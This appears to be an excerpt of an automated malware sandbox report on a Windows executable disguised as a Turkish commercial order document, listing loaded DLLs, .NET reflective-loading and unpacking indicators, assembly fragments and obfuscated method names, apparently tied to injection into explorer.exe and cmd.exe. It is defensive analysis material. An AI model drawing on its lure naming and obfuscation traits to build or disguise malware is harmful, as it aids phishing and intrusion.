Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wininet.dll	Jump to behavior

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

.NET source code contains potential unpacker

Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: bBvN.pdbSHA256 source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe
Source:	Binary string: cmd.pdbUGP source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe, 00000006.00000002.2192065955.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, 00000008.00000002.4538576758.0000000000790000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe, 00000006.00000002.2191061034.00000000011D0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.4539998201.0000000003750000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000008.00000003.2192228602.000000000359D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000003.2190559274.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.4539998201.00000000038EE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe, Ticari Siparis Belgesi 26 07 2024 17545000600.exe, 00000006.00000002.2191061034.00000000011D0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, cmd.exe, 00000008.00000002.4539998201.0000000003750000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000008.00000003.2192228602.000000000359D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000003.2190559274.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.4539998201.00000000038EE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: bBvN.pdb source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe
Source:	Binary string: cmd.pdb source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe, 00000006.00000002.2192065955.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, cmd.exe, 00000008.00000002.4538576758.0000000000790000.00000040.80000000.00040000.00000000.sdmp

Data Obfuscation

Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe, frmMain.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.2a47c60.5.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.2a47c60.5.raw.unpack, PingPong.cs	.Net Code: Justy
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.2a76748.4.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.2a76748.4.raw.unpack, PingPong.cs	.Net Code: Justy
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, BZGao2DXdnGg50S4nE.cs	.Net Code: oYhA4NPrMT System.Reflection.Assembly.Load(byte[])
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.5620000.9.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.5620000.9.raw.unpack, PingPong.cs	.Net Code: Justy
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, BZGao2DXdnGg50S4nE.cs	.Net Code: oYhA4NPrMT System.Reflection.Assembly.Load(byte[])
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3dcfaf0.8.raw.unpack, BZGao2DXdnGg50S4nE.cs	.Net Code: oYhA4NPrMT System.Reflection.Assembly.Load(byte[])
Source: 7.2.explorer.exe.10acf840.0.raw.unpack, frmMain.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_04FDD238 push eax; iretd	0_2_04FDD241
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0040E33E pushfd ; retf	6_2_0040E3A2
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0040E39D pushfd ; retf	6_2_0040E3A2
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0040E440 push FFFFFF8Bh; ret	6_2_0040E45E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0041D4B5 push eax; ret	6_2_0041D508
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0041D56C push eax; ret	6_2_0041D572
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0041D502 push eax; ret	6_2_0041D508
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0041D50B push eax; ret	6_2_0041D572
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011D225F pushad ; ret	6_2_011D27F9
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011D27FA pushad ; ret	6_2_011D27F9
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012009AD push ecx; mov dword ptr [esp], ecx	6_2_012009B6
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011D283D push eax; iretd	6_2_011D2858
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011D1368 push eax; iretd	6_2_011D1369
Source: C:\Windows\explorer.exe	Code function: 7_2_0972A9B5 push esp; retn 0000h	7_2_0972AAE7
Source: C:\Windows\explorer.exe	Code function: 7_2_0972AB1E push esp; retn 0000h	7_2_0972AB1F
Source: C:\Windows\explorer.exe	Code function: 7_2_0972AB02 push esp; retn 0000h	7_2_0972AB03
Source: C:\Windows\explorer.exe	Code function: 7_2_10467B02 push esp; retn 0000h	7_2_10467B03
Source: C:\Windows\explorer.exe	Code function: 7_2_10467B1E push esp; retn 0000h	7_2_10467B1F
Source: C:\Windows\explorer.exe	Code function: 7_2_104679B5 push esp; retn 0000h	7_2_10467AE7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A71ED push ecx; ret	8_2_007A7200
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A722B push ecx; ret	8_2_007A723E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0375225F pushad ; ret	8_2_037527F9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037527FA pushad ; ret	8_2_037527F9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037809AD push ecx; mov dword ptr [esp], ecx	8_2_037809B6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0375283D push eax; iretd	8_2_03752858
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03751350 push eax; iretd	8_2_03751369
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_02E3E39D pushfd ; retf	8_2_02E3E3A2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_02E3E33E pushfd ; retf	8_2_02E3E3A2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_02E4D4B5 push eax; ret	8_2_02E4D508
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_02E3E440 push FFFFFF8Bh; ret	8_2_02E3E45E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_02E4D56C push eax; ret	8_2_02E4D572

Source: Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Static PE information: section name: .text entropy: 7.978982023106639

Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, gOiaWKgfVnkFQdi03Z.cs	High entropy of concatenated method names: 'LLI17NsGrJ', 'EOx1QRVbtS', 'oRf1eNX48e', 'mqMevKrg0f', 'CYQezqlUB8', 'Vi216vtUwK', 'aZo1a92sH9', 'IV01lKCpra', 'AUX1Rxlm3C', 'Fad1A9RTMG'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, U2KqfffNymPq7qjA8I.cs	High entropy of concatenated method names: 'OMdiopsHbe', 'mf4iI7j8nE', 'wKTiS2cGSA', 'sAiigF2h8O', 'N0yiF316ci', 'mHbibi8EYt', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, ah0kbSHK40J96Vo2hb.cs	High entropy of concatenated method names: 'Ay4NE3ZGwk', 'n6WNvJoorJ', 'eMAi6I0fo2', 'bchiacAcFk', 'xRENBUgTDG', 'gQaNxPfn0J', 'OYhNy5hqV4', 'zL1NFhyNcv', 'akBNOKgmsr', 'fWaNktn9Xy'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, oOSLaJiXYcsR9gu6Ws.cs	High entropy of concatenated method names: 'OtD9FeDAnQ', 'NBu9OGVfEv', 'KMX9kiyjyq', 'qjU9H28NDL', 'w509tpQnfV', 'uMK9mPQm2K', 'J1I95ulZug', 'LRI9Ee6efP', 'Tx99UGpwtC', 'aVV9vZ5tpK'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, tSvgqiL3ya0FMASywp.cs	High entropy of concatenated method names: 'rjHi7lxJy2', 'b44i9WBBPX', 'pmRiQsP3aq', 'GCriK8uOx5', 'ENAieQWit3', 'EcKi1lkMJX', 'LIbiJm5SXJ', 'nPkidSkefY', 'eHdiftSvuv', 'JREiYXJiKR'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, tFmfrmcTFeFYBPVGf8.cs	High entropy of concatenated method names: 'Hek1CWLAjI', 'K6s1sijkvN', 'FQ514IBnWV', 'gL612LLi83', 'tFP1nS8vul', 'rlY1WEcejE', 'dHR1TAuftf', 'br71cL1uMQ', 'JZn1pqp6af', 'r8K1GmJJIc'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, o8ZEMM6Y3kX8Ei4xMt.cs	High entropy of concatenated method names: 'ogQQ2X7iRo', 'HpiQWrWyIs', 'i3YQcwRamu', 'tFgQprlOqD', 'pxgQ0XSBtQ', 'yQOQrJgoSp', 'DQ1QNvs5xJ', 'sGmQiOvgZe', 'fDfQqF7DiW', 'FH1QV8GB2H'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, YWPamvUhpR0aeKMiX8.cs	High entropy of concatenated method names: 'Dispose', 'lD1aUgyaAN', 'xhDlIEkUMZ', 'SMPZZ8FNiw', 'kwGavxGUsa', 'dHvaz8jDPv', 'ProcessDialogKey', 'tJKl6SILh7', 'ab7laYPqBH', 'CavllUELSm'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, fwLolazv9fyHtQ4vva.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'A30qMSS7yU', 'gsFq0Sf3ll', 'lHiqrNxOZD', 'AR0qNd98OU', 'tJTqihAGhK', 'PT2qqXqjru', 'BaZqVDA40q'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, BZGao2DXdnGg50S4nE.cs	High entropy of concatenated method names: 'fBARLbGSwB', 'VwDR7dNNAx', 'h99R9CnQSj', 'mTARQFeeXT', 'ep6RKJXT5o', 'k8qRehSe0f', 'UFlR1rhjO3', 'h1xRJOUuJW', 'S29Rdcda1T', 'iKqRfuTYpb'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, t4vIAioxiY9L8sTcju.cs	High entropy of concatenated method names: 'B0nqacFiWa', 'mkkqRvjDMu', 'XkWqAM24Qm', 'sS7q7fSwaB', 'n51q9HZGMh', 'kubqKCxNUY', 'UPFqeEISsD', 'YdIi5xFSSw', 'rtviESMZvs', 'gjoiUbI4mn'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, NJgpEdEdtoODidsa3q.cs	High entropy of concatenated method names: 'ndB4tldmo', 'Ova2yhhTu', 'uspWuOPZj', 'ERtT0fBKt', 'sHTpH7sS2', 'Q8GG0RrBV', 'TsIZhT3kaXVTGpvFAk', 'vPngjr1ZnN77OvqJ5p', 'r4yiXQqGS', 'ibMV45qCw'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, QD8cW6QYGWAEa23pEf.cs	High entropy of concatenated method names: 'GjJeLmDFWJ', 'HCme95Mew2', 'FcTeKbWZ4o', 'Vyce1109Hn', 'NxMeJU9Bqn', 'zsEKtZeVKA', 'jMCKmmqSdK', 'p55K5yeiCD', 'AYQKEcavkn', 'SfWKUDUIWS'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, EVrMGL9wn5b3ZhtoWA.cs	High entropy of concatenated method names: 't6b0uDvSMK', 'faJ0xO1vWo', 'SaW0FM4xxn', 'LxA0OEmu8N', 'Sqg0IsSLD5', 'O290Se1Krr', 'jiw0gBeVbX', 'fUs0bRUdXm', 'yT40PkOrpq', 'FtR0hQ1l82'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, eSIbCv4g67m5RqgTQm.cs	High entropy of concatenated method names: 'B52a1dqsZs', 'UahaJBSbFv', 'qkGafoPrxc', 'mTLaYwH4vO', 'M9ta01vueb', 'Q4Yar64avu', 'sO1CSmv3jjqo3yAkrx', 'oiv177SQ2bJIGd5POj', 'yCTaa6XLCH', 'jvfaRMPHYx'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, DKlthmPWWLNRkw3Ofkh.cs	High entropy of concatenated method names: 'mvvqChYYy9', 'BDYqsBUTbU', 'vxmq4IXFKk', 'WvJq2oGHex', 'usTqn1jriY', 'sEpqWuceMp', 'BjIqTxW7Pp', 'xsvqcGjpLT', 'RkPqpJe5Q0', 'N47qGafu4o'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, C3IHPZhoafdfCmVdPx.cs	High entropy of concatenated method names: 'P9IKn1Gb4N', 'lq6KT07Ohe', 'nCkQSAHSds', 'J9KQgs5ijI', 'CTZQbj7jp7', 'CEZQPNlmIu', 'eDkQh6TlVT', 'T9xQjCc8kI', 'qtTQDWrKgA', 'HcgQu55M0K'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, MEggSNrSchJlDZ44U1.cs	High entropy of concatenated method names: 'kIjMcyx42Q', 'SCyMpZKpVf', 'rOUMoGT4QS', 'aD0MIyyX1u', 'k2CMghclIr', 'EZaMbGGsf7', 'O3GMhEGtVx', 'EUbMj299UV', 'GBlMuIQPfQ', 'JvmMBg0HCO'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.3d5fed0.7.raw.unpack, U4gvU7PbL6NdfpqcPUs.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'COnVFHWEWW', 'ebMVOl6RIt', 'thuVkDow78', 'okYVHSxNdk', 'IFoVtxuvyo', 'GbyVmfLYC7', 'J9TV51wt19'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, gOiaWKgfVnkFQdi03Z.cs	High entropy of concatenated method names: 'LLI17NsGrJ', 'EOx1QRVbtS', 'oRf1eNX48e', 'mqMevKrg0f', 'CYQezqlUB8', 'Vi216vtUwK', 'aZo1a92sH9', 'IV01lKCpra', 'AUX1Rxlm3C', 'Fad1A9RTMG'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, U2KqfffNymPq7qjA8I.cs	High entropy of concatenated method names: 'OMdiopsHbe', 'mf4iI7j8nE', 'wKTiS2cGSA', 'sAiigF2h8O', 'N0yiF316ci', 'mHbibi8EYt', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, ah0kbSHK40J96Vo2hb.cs	High entropy of concatenated method names: 'Ay4NE3ZGwk', 'n6WNvJoorJ', 'eMAi6I0fo2', 'bchiacAcFk', 'xRENBUgTDG', 'gQaNxPfn0J', 'OYhNy5hqV4', 'zL1NFhyNcv', 'akBNOKgmsr', 'fWaNktn9Xy'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, oOSLaJiXYcsR9gu6Ws.cs	High entropy of concatenated method names: 'OtD9FeDAnQ', 'NBu9OGVfEv', 'KMX9kiyjyq', 'qjU9H28NDL', 'w509tpQnfV', 'uMK9mPQm2K', 'J1I95ulZug', 'LRI9Ee6efP', 'Tx99UGpwtC', 'aVV9vZ5tpK'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, tSvgqiL3ya0FMASywp.cs	High entropy of concatenated method names: 'rjHi7lxJy2', 'b44i9WBBPX', 'pmRiQsP3aq', 'GCriK8uOx5', 'ENAieQWit3', 'EcKi1lkMJX', 'LIbiJm5SXJ', 'nPkidSkefY', 'eHdiftSvuv', 'JREiYXJiKR'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, tFmfrmcTFeFYBPVGf8.cs	High entropy of concatenated method names: 'Hek1CWLAjI', 'K6s1sijkvN', 'FQ514IBnWV', 'gL612LLi83', 'tFP1nS8vul', 'rlY1WEcejE', 'dHR1TAuftf', 'br71cL1uMQ', 'JZn1pqp6af', 'r8K1GmJJIc'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, o8ZEMM6Y3kX8Ei4xMt.cs	High entropy of concatenated method names: 'ogQQ2X7iRo', 'HpiQWrWyIs', 'i3YQcwRamu', 'tFgQprlOqD', 'pxgQ0XSBtQ', 'yQOQrJgoSp', 'DQ1QNvs5xJ', 'sGmQiOvgZe', 'fDfQqF7DiW', 'FH1QV8GB2H'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, YWPamvUhpR0aeKMiX8.cs	High entropy of concatenated method names: 'Dispose', 'lD1aUgyaAN', 'xhDlIEkUMZ', 'SMPZZ8FNiw', 'kwGavxGUsa', 'dHvaz8jDPv', 'ProcessDialogKey', 'tJKl6SILh7', 'ab7laYPqBH', 'CavllUELSm'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, fwLolazv9fyHtQ4vva.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'A30qMSS7yU', 'gsFq0Sf3ll', 'lHiqrNxOZD', 'AR0qNd98OU', 'tJTqihAGhK', 'PT2qqXqjru', 'BaZqVDA40q'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, BZGao2DXdnGg50S4nE.cs	High entropy of concatenated method names: 'fBARLbGSwB', 'VwDR7dNNAx', 'h99R9CnQSj', 'mTARQFeeXT', 'ep6RKJXT5o', 'k8qRehSe0f', 'UFlR1rhjO3', 'h1xRJOUuJW', 'S29Rdcda1T', 'iKqRfuTYpb'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, t4vIAioxiY9L8sTcju.cs	High entropy of concatenated method names: 'B0nqacFiWa', 'mkkqRvjDMu', 'XkWqAM24Qm', 'sS7q7fSwaB', 'n51q9HZGMh', 'kubqKCxNUY', 'UPFqeEISsD', 'YdIi5xFSSw', 'rtviESMZvs', 'gjoiUbI4mn'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, NJgpEdEdtoODidsa3q.cs	High entropy of concatenated method names: 'ndB4tldmo', 'Ova2yhhTu', 'uspWuOPZj', 'ERtT0fBKt', 'sHTpH7sS2', 'Q8GG0RrBV', 'TsIZhT3kaXVTGpvFAk', 'vPngjr1ZnN77OvqJ5p', 'r4yiXQqGS', 'ibMV45qCw'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, QD8cW6QYGWAEa23pEf.cs	High entropy of concatenated method names: 'GjJeLmDFWJ', 'HCme95Mew2', 'FcTeKbWZ4o', 'Vyce1109Hn', 'NxMeJU9Bqn', 'zsEKtZeVKA', 'jMCKmmqSdK', 'p55K5yeiCD', 'AYQKEcavkn', 'SfWKUDUIWS'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, EVrMGL9wn5b3ZhtoWA.cs	High entropy of concatenated method names: 't6b0uDvSMK', 'faJ0xO1vWo', 'SaW0FM4xxn', 'LxA0OEmu8N', 'Sqg0IsSLD5', 'O290Se1Krr', 'jiw0gBeVbX', 'fUs0bRUdXm', 'yT40PkOrpq', 'FtR0hQ1l82'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, eSIbCv4g67m5RqgTQm.cs	High entropy of concatenated method names: 'B52a1dqsZs', 'UahaJBSbFv', 'qkGafoPrxc', 'mTLaYwH4vO', 'M9ta01vueb', 'Q4Yar64avu', 'sO1CSmv3jjqo3yAkrx', 'oiv177SQ2bJIGd5POj', 'yCTaa6XLCH', 'jvfaRMPHYx'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, DKlthmPWWLNRkw3Ofkh.cs	High entropy of concatenated method names: 'mvvqChYYy9', 'BDYqsBUTbU', 'vxmq4IXFKk', 'WvJq2oGHex', 'usTqn1jriY', 'sEpqWuceMp', 'BjIqTxW7Pp', 'xsvqcGjpLT', 'RkPqpJe5Q0', 'N47qGafu4o'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, C3IHPZhoafdfCmVdPx.cs	High entropy of concatenated method names: 'P9IKn1Gb4N', 'lq6KT07Ohe', 'nCkQSAHSds', 'J9KQgs5ijI', 'CTZQbj7jp7', 'CEZQPNlmIu', 'eDkQh6TlVT', 'T9xQjCc8kI', 'qtTQDWrKgA', 'HcgQu55M0K'
Source: 0.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.6d60000.11.raw.unpack, MEggSNrSchJlDZ44U1.cs	High entropy of concatenated method names: 'kIjMcyx42Q', 'SCyMpZKpVf', 'rOUMoGT4QS', 'aD0MIyyX1u', 'k2CMghclIr', 'EZaMbGGsf7', 'O3GMhEGtVx', 'EUbMj299UV', 'GBlMuIQPfQ', 'JvmMBg0HCO'
